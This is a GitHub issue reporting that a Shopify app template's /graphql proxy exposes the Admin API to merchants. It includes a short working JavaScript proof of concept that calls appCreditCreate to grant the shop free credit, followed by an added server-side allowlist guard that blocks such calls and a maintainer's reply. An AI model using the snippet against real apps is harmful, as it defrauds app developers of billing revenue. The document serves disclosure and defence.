Is exposing ApolloClient/Admin GraphQL API to the frontend a bad idea? #128

Closed
tolgap opened this issue Dec 9, 2019 · 1 comment

Comments

tolgap commented Dec 9, 2019

Issue summary

Exposing ApolloClient in the frontend will allow a shop using your paid app to edit their subscription line items or even give app credits to themselves.

Expected behavior

A shop shouldn't be allowed to change their own subscription items, or give themselves appCredits.

Actual behavior

If I inspect the ApolloClient in my browser, I can notice that it makes API calls to /graphql. If I start inspecting the queries that are sent to /graphql, I can figure out that it's using the GraphQL Admin API.

Through this, I can deduce that I will have full access to the current AppInstallation, all through my browser. Even just performing fetch('/graphql') in my JS console would allow me to alter my AppInstallation to be $0.01, or give myself credits through the appCreditCreate mutation.

Steps to reproduce the problem

  1. Set up a new Shopify node app with shopify-app-cli.
  2. Visit the URL and when you're greeted with the default welcome message
  3. Set up recurring billing using the docs
  4. Log out and log back in; you will be prompted to perform a test payment for your app
  5. Perform the payment and you're redirected to the welcome page
  6. Open the JS console and run the following:

Reduced test case

// The appCreditCreate mutation exactly as the Admin API accepts it
let mutation = {
  query: "mutation appCreditCreate($description: String!, $amount: MoneyInput!) { appCreditCreate(description: $description, amount: $amount) { appCredit { id amount { currencyCode amount } } } }",
  variables: { description: "hackerman credit", amount: { amount: "14.99", currencyCode: "USD" } }
};

// The app's own /graphql proxy accepts the session cookie and forwards the
// request to the Admin API with the app's access token
let response = await fetch('/graphql', {
  credentials: 'include',
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify(mutation)
});

console.log(await response.json());

Specifications

  • Browser: Firefox 71.0
  • Device: Macbook Pro
  • Operating System: OSX 10.13.6
tolgap changed the title from "Is exposing ApolloClient to the frontend a bad idea?" to "Is exposing ApolloClient/Admin GraphQL API to the frontend a bad idea?" on Dec 9, 2019
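The hazard in the report is a general-purpose server-side proxy: whatever the browser posts to /graphql is forwarded to the Admin API with the app's access token, so the shop can run any mutation the app can. The following is an added example, not code from the shopify-app-node project or from the issue author. It shows the guard such a proxy route would call before forwarding: a deny-by-default allowlist of top-level operations, evaluated on the server with a small fail-closed lexer rather than by trusting the client. The allowlisted field names (`shop`, `products`, `orders`, `productUpdate`) are assumptions for illustration; billing mutations such as appCreditCreate are deliberately absent. The route wiring around it (Koa or Express) is not shown.

```javascript
// Added example, not code from the shopify-app-node project or the issue author.
// Guard for a server-side /graphql proxy that would otherwise forward any
// browser request to the Shopify Admin API with the app's access token.
// The allowlisted field names below are assumptions for illustration.

const ALLOWED_QUERY_FIELDS = new Set(["shop", "products", "orders"]);
// Billing mutations (appCreditCreate, appSubscriptionCreate, ...) never appear
// here: they are only ever issued from trusted server-side code.
const ALLOWED_MUTATION_FIELDS = new Set(["productUpdate"]);

// Minimal GraphQL lexer: whitespace, commas and comments are dropped; any
// character it does not recognise throws, so the guard fails closed.
function tokenize(src) {
  const re = /\s+|,|#[^\n]*|"""[\s\S]*?"""|"(?:\\.|[^"\\])*"|\.\.\.|[{}():@$=!|\[\]]|-?\d+(?:\.\d+)?(?:[eE][+-]?\d+)?|[A-Za-z_]\w*/y;
  const tokens = [];
  for (let i = 0; i < src.length; ) {
    re.lastIndex = i;
    const m = re.exec(src);
    if (!m) throw new Error(`unexpected character at ${i}`);
    i = re.lastIndex;
    if (!/^(\s|,|#)/.test(m[0])) tokens.push(m[0]);
  }
  return tokens;
}

const NAME = /^[A-Za-z_]\w*$/;

// Returns [{ type, name, fields }] for each top-level operation. Fragment
// definitions and top-level spreads are rejected rather than resolved, since
// a spread could smuggle a field past the allowlist.
function parseOperations(tokens) {
  const ops = [];
  let i = 0;
  while (i < tokens.length) {
    if (tokens[i] === "fragment") throw new Error("fragment definitions not allowed");
    let type = "query";
    let name = null;
    if (["query", "mutation", "subscription"].includes(tokens[i])) type = tokens[i++];
    if (NAME.test(tokens[i] ?? "")) name = tokens[i++];
    // Skip variable definitions and directives up to the selection set's "{".
    let paren = 0;
    while (i < tokens.length && !(tokens[i] === "{" && paren === 0)) {
      if (tokens[i] === "(") paren++;
      if (tokens[i] === ")") paren--;
      i++;
    }
    if (i >= tokens.length) throw new Error("operation has no selection set");
    const fields = [];
    let depth = 0;
    paren = 0;
    for (; i < tokens.length; i++) {
      const t = tokens[i];
      if (t === "(") { paren++; continue; }
      if (t === ")") { paren--; continue; }
      if (paren > 0) continue;              // braces inside arguments are input objects
      if (t === "{") { depth++; continue; }
      if (t === "}") { if (--depth === 0) { i++; break; } continue; }
      if (depth !== 1) continue;            // only top-level selections matter
      if (t === "@") { i++; continue; }     // directive: skip its name
      if (t === "...") throw new Error("fragment spreads not allowed");
      if (NAME.test(t)) {
        // "alias: field" -> the real field name follows the colon
        if (tokens[i + 1] === ":") { fields.push(tokens[i + 2]); i += 2; }
        else fields.push(t);
      }
    }
    ops.push({ type, name, fields });
  }
  return ops;
}

// The check a proxy route calls before forwarding: true only for exactly one
// query or mutation whose top-level fields are all allowlisted.
function isAllowedRequest(body) {
  if (!body || typeof body.query !== "string") return false;
  try {
    const ops = parseOperations(tokenize(body.query));
    if (ops.length !== 1) return false;   // no multi-operation documents
    const [op] = ops;
    const allow = { query: ALLOWED_QUERY_FIELDS, mutation: ALLOWED_MUTATION_FIELDS }[op.type];
    return !!allow && op.fields.length > 0 && op.fields.every((f) => allow.has(f));
  } catch {
    return false;
  }
}

// Constructed sample: the request body from the issue's reduced test case.
const ISSUE_MUTATION = {
  query: "mutation appCreditCreate($description: String!, $amount: MoneyInput!) { appCreditCreate(description: $description, amount: $amount) { appCredit { id amount { currencyCode amount } } } }",
  variables: { description: "hackerman credit", amount: { amount: "14.99", currencyCode: "USD" } },
};

console.log(isAllowedRequest(ISSUE_MUTATION));                 // false: appCreditCreate is not allowlisted
console.log(isAllowedRequest({ query: "{ shop { name } }" }));  // true
```

The guard deliberately refuses aliases that hide the real field name, multi-operation documents, fragments and directives it cannot account for, because every one of those is a way to reach a field the allowlist never named. Even with the guard, the underlying design flaw stands: a proxy that replays the app's offline Admin token on behalf of a browser session gives the merchant the app's authority, so the safer shape is purpose-built server endpoints for the few operations the embedded UI needs, with billing calls never reachable from the client at all.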
katiedavis (Contributor) commented

Hi @tolgap, thanks for bringing this issue here.

We are looking into the issue opened in the proxy that you commented on and we're going to address it there. The proxy exposes the API to the FE.

Closing this for now, but I know you're tagged on the other issue so you can follow there.
